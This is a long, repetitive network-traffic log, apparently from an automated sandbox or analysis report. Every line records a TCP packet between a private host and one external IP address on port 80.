            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
